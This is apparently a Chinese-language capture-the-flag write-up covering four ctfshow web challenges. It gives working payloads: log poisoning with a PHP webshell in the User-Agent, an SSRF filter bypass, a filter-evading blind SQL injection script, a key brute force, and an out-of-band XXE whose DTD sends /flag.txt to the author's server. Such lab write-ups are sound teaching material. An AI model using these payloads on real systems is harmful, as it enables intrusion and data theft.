簽到_觀己

首先我嘗試了一波data偽協議發現被禁止了，想了半天結果忘記了日志包含了害file=/var/log/nginx/access.log

嘗試在UA中放入一句話木馬

蕪湖，起飛！

system("ls /");

結束

web1_觀字

代碼審計,題目的意思是想我們通過curl http://192.168.7.68/flag的回顯得到flag,但是.被過濾了，然后我想到了把ip轉換為數字，192.168.1.100與3232237668這個是等價的(數字地址與IP地址)但是這道題過濾了0我靠，最后看師傅們的wp可以用，代替.

<?php

#flag in http://192.168.7.68/flag
if(isset($_GET['url'])){
    $url = $_GET['url'];
    $protocol = substr($url, 0,7);
    if($protocol!='http://'){
        die('僅限http協議訪問');
    }
    if(preg_match('/\.|\;|\||\<|\>|\*|\%|\^|\(|\)|\#|\@|\!|\`|\~|\+|\'|\"|\.|\,|\?|\[|\]|\{|\}|\!|\&|\$|0/', $url)){
        die('僅限域名地址訪問');
    }
    system('curl '.$url);
}

最后得到了flag

web2_觀星

一看就知道是sql注入的題，經過fuzz發現一堆被禁用的函式

常規的sql盲注payload大致為
1^if(1=1,1,0)但是我們現在能用的不多
過濾了空格可以用括號代替；
過濾了單引號可以用16進制代替；
過濾了逗號，對于substr可以用 substr(database() from 1 for 1 )代替substr(database(),1,1)
if中有逗號可以用case when代替if；
過濾了 ascii可以用ord代替；
過濾了等號和like可以用regexp代替，
這樣上面的常規陳述句就可以轉化為
id=1^case(ord(substr(database()from(1)for(1))))when(102)then(2)else(3)end

import requests
import time
url = "http://0d7d7067-4ff7-4557-a713-af5bd4d3ed35.chall.ctf.show/index.php?id=0^"
flag = ""
for i in range(1, 50):
    for j in range(38, 126):
        # payload="case(ord(substr(database()from({0})for(1))))when({1})then(1)else(2)end".format(i,j)
        # payload="case(ord(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema)regexp(database()))from({0})for(1))))when({1})then(1)else(2)end".format(i,j)
        # payload="case(ord(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name)regexp(0x666c6167))from({0})for(1))))when({1})then(1)else(2)end".format(i,j)
        payload = "case(ord(substr((select(group_concat(flag))from(flag))from({0})for(1))))when({1})then(1)else(2)end".format(i, j)
        u = url + payload
        r = requests.get(u)
        time.sleep(0.3)
        if "By Rudyard Kipling" in r.text:
            flag += chr(j)
            print(flag)
            break

web3_觀圖

首先查看原始碼，發現這個，使用base64解密發現是一堆亂碼，把后面image引數去掉后出現源代碼

在PHP官方檔案當中我們看到，所以具有爆破的可行性

Note: 在某些平臺下（例如 Windows）getrandmax() 只有 32767，如果需要的范圍大于 32767，那么指定 min
和 max 引數就可以生成更大的數了，或者考慮用 mt_rand() 來替代之，

最后爆出來是27347

/*author 
    Y4tacker
*/
<?php
for($i=0;$i<32768;$i++){
    $key = substr(md5('ctfshow'.$i),3,8);
    $image="Z6Ilu83MIDw=";
    $str = openssl_decrypt($image, 'bf-ecb', $key);
    if(strpos($str,"jpg") or strpos($str,"png") or strpos($str,"gif")){
        print($i);
        break;
    }
}

接下來就是拿著密鑰去生成了唄

<?php
/*author
    Y4tacker
*/
$rand=27347;
$key = substr(md5('ctfshow'.$rand),3,8);
$image="config.php";
$str = openssl_encrypt($image, 'bf-ecb', $key);
echo $str;

結束

web4_觀心

我也是先玩了一下，臥槽居然真的是這樣的，猜對了，接下里我們查看網頁源代碼得到提示<!-- flag in filesystem /flag.txt -->

啊這，說實話我蒙蔽了，然后我去看了下WP，一看到XXE，hh秒懂，當然WP還沒看完我打算自己琢磨下，先去我的VPS搞一下,我們這里采用的思路是 通過DTD竊取檔案
首先第一個xml檔案為

<?xml version="1.0"?>
<!DOCTYPE data SYSTEM "http://test.y4tacker.top/evil.dtd">

接下來

<!ENTITY % p1 SYSTEM "php://filter/read=convert-base64.encode/resource=/flag.txt">
<!ENTITY % p2 "<!ENTITY xxe SYSTEM 'http://我服務器的ip:7999/?pass=%p1;'>">
%p2;

之后我在我的另一臺服務器上面開啟了監聽

啊這，草草草監聽沒用，不知道為啥，反正頁面報錯出來了flag
，不過猜測應該是內網環境的原因吧

參考文章

SSRF繞過方法總結
XXE漏洞利用技巧：從XML到遠程代碼執行